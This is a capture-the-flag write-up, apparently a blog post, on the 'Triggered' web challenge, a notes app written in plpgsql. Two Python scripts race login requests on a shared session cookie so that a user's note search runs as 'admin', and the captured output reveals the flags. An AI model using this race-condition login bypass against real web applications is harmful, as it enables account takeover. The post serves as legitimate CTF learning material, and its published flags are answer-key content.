Problem Description
Triggered - Web (280 pts)
I stared into the abyss of microservices, and it stared back. I found something utterly terrifying about the chaos of connections.
"Screw this," I finally declared, "why have multiple services when the database can do everything just fine on its own?"
And so on that glorious day it came to be that everything ran in plpgsql.
Write up
Below codes should run at same time due to race condition exploit.
First Code:
1: import requests
2:
3: def request_post(url, cookies, data):
4: r = requests.post(url, cookies=cookies, data=data)
5: if r.url == "http://triggered.pwni.ng:52856/search":
6: if "Hey there, admin" in r.text:
7: print r.text
8: print "[-] Result: Found out!"
9: exit()
10: return r
11:
12: def signin():
13: #signin
14: data = {'username':'searchtheflag'}
15: url = "http://triggered.pwni.ng:52856/login"
16: request_post(url, cookies, data)
17: data = {'password':'test'}
18: url = "http://triggered.pwni.ng:52856/login/password"
19: request_post(url, cookies, data)
20: print "[-] Sign-in: Okay"
21:
22: if __name__ == "__main__":
23: cookies = {
24: 'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b"
25: }
26: signin()
27: while True:
28: #searchflag
29: data = {'query':'flag'}
30: url = "http://triggered.pwni.ng:52856/search"
31: r = request_post(url, cookies, data)
32: print "[-] Search: in progress"
33: if (r.url == "http://triggered.pwni.ng:52856/login"):
34: signin()
35:
Second Code:
1: import requests, time
2:
3: def request_post(url, cookies, data):
4: r = requests.post(url, cookies=cookies, data=data)
5: return r
6:
7: def signin_admin(cookies):
8: data = {'username':'admin'}
9: url = 'http://triggered.pwni.ng:52856/login'
10: request_post(url, cookies, data)
11:
12: if __name__ == "__main__":
13: cookies = {
14: 'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b" #your session
15: }
16: while True:
17: signin_admin(cookies)
18:
Result & Flag:
1: [-] Sign-in: Okay
2: [-] Search: in progress
3: [-] Search: in progress
4: [-] Search: in progress
5: [-] Search: in progress
6: [-] Search: in progress
7: [-] Search: in progress
8: [-] Search: in progress
9: [-] Search: in progress
10: [-] Search: in progress
11: [-] Search: in progress
12: [-] Search: in progress
13: [-] Sign-in: Okay
14: [-] Search: in progress
15: [-] Sign-in: Okay
16: [-] Search: in progress
17: [-] Sign-in: Okay
18: [-] Search: in progress
19: [-] Sign-in: Okay
20: [-] Search: in progress
21: [-] Sign-in: Okay
22: [-] Search: in progress
23: [-] Sign-in: Okay
24: [-] Search: in progress
25: [-] Sign-in: Okay
26: [-] Search: in progress
27: [-] Sign-in: Okay
28: [-] Search: in progress
29: [-] Sign-in: Okay
30: [-] Search: in progress
31: [-] Sign-in: Okay
32: [-] Search: in progress
33: [-] Sign-in: Okay
34: [-] Search: in progress
35: [-] Sign-in: Okay
36: [-] Search: in progress
37: [-] Sign-in: Okay
38: [-] Search: in progress
39: [-] Sign-in: Okay
40: [-] Search: in progress
41: [-] Sign-in: Okay
42: [-] Search: in progress
43: [-] Sign-in: Okay
44: [-] Search: in progress
45: [-] Sign-in: Okay
46: [-] Search: in progress
47: [-] Sign-in: Okay
48: [-] Search: in progress
49: [-] Sign-in: Okay
50: [-] Search: in progress
51: [-] Sign-in: Okay
52: [-] Search: in progress
53: [-] Sign-in: Okay
54: <html>
55: <head>
56: <link rel="stylesheet" href="/static/styles.css" />
57: <link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700,700i,900,900i" rel="stylesheet">
58: </head>
59: <body>
60: <header>
61: <a href="/" class="left">
62: <h1>pgNotes</h1>
63: <h2>Let's keep it PG, ok?</h2>
64: </a>
65: <div class="right">
66:
67: <nav>
68: <div class="welcome">Hey there, admin</div>
69: ·
70: <a href="/search">Search notes</a>
71: ·
72: <a href="/note/new">New note</a>
73: ·
74: <a href="/logout">Logout</a>
75: </nav>
76:
77: </div>
78: </header>
79: <main>
80: <section class="search-input">
81: <h3>Search</h3>
82: <form method="POST" action="/search">
83: <div class="input">
84: <label>Query</label>
85: <input type="text" name="query" />
86: </div>
87: <div class="input submit">
88: <input type="submit" />
89: </div>
90: </form>
91: </section>
92:
93: <section class="search-query">
94: Results for <span class="query">flag</span>
95: </section>
96:
97:
98: <section class="note">
99: <section class="header">
100: <h4>Flag</h4>
101: <div class="author">admin</div>
102: <div class="date">02:44pm on April 13, 2019</div>
103: </section>
104: <section class="content">
105: <p>
106: PCTF{i_rAt3_p0sTgRE5_1O_oUT_0f_14_pH_n3ed5_m0Re_4Cid}
107: </p>
108: </section>
109: </section>
110:
111: <section class="note">
112: <section class="header">
113: <h4>flag</h4>
114: <div class="author">admin</div>
115: <div class="date">08:11am on April 14, 2019</div>
116: </section>
117: <section class="content">
118: <p>
119: PCTF{cr4zy_70_m4k3_w3b_4ppl1c4710n_w17h_plp65ql}
120: </p>
121: </section>
122: </section>
123:
124: <section class="note">
125: <section class="header">
126: <h4>flag</h4>
127: <div class="author">admin</div>
128: <div class="date">04:51pm on April 14, 2019</div>
129: </section>
130: <section class="content">
131: <p>
132: PCTF{PsQl_w3bs3rv3rf0rh1pst3r_l0l}
133: </p>
134: </section>
135: </section>
136:
137: <section class="note">
138: <section class="header">
139: <h4>Flag</h4>
140: <div class="author">admin</div>
141: <div class="date">06:55pm on April 14, 2019</div>
142: </section>
143: <section class="content">
144: <p>
145: PCTF{pGn0Te2_Lets_k22P_1t_PG_oK}
146: </p>
147: </section>
148: </section>
149:
150:
151:
152: </main>
153: </body>
154: </html>
155: [-] Result: Found out!
Thanks @gP4yload
No comments:
Post a Comment